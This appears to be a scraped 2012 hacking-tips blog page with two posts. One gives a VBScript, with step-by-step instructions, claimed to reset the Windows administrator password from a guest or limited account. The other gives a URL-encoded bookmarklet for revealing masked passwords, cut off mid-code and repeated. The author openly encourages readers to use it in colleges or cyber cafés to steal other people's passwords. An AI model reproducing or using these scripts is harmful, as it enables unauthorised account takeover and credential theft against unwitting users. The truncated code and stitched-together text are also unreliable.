Watch Ek tha tiger online..
Saturday, September 15, 2012
Wednesday, June 27, 2012
Browse > Home / /
Change Windows Administrator Password Using Limited Account
If you have forgotten your Windows Administrator password then by using guest account or any other limited account you can reset administrator password very easily. All you have to do is to create a file, paste the following script in it and set desired new password in it. Save that file in .vbs format. Run it, Administrator password will be changed. Option Explicit Dim oNet,sUser,sComputer Set oNet = Wscript.CreateObject("Wscript.Network") sUser = oNet.UserName sComputer = oNet.ComputerName On Error Resume Next Set sUser = GetObject("WinNT://" & sComputer & "/admin,user") sUser.SetPassword "new-password" sUser.SetInfo Open notepad. Copy paste above code in that. change new-password text from sUser.SetPassword “ashish ” into desired password. Save it with .vbs extension. Run it. Now log off. Enjoy your lost windows admin account again.Friday, February 10, 2012
Browse > Home / / How to view hidden passwords without using any software.
How to view hidden passwords without using any software.
Just Copy and Paste this code in your Browser URL to reveal the hidden password.
javascriptfunction(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j
Most Hacker use this script to hack the user password….
U can use this script in college or in cyber cafĂ© to hack some1 password…. Many people forgot to logout u can used this script there Or just used for Fun
javascriptfunction(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j
Most Hacker use this script to hack the user password….
U can use this script in college or in cyber cafĂ© to hack some1 password…. Many people forgot to logout u can used this script there Or just used for Fun
Subscribe to:
Comments (Atom)

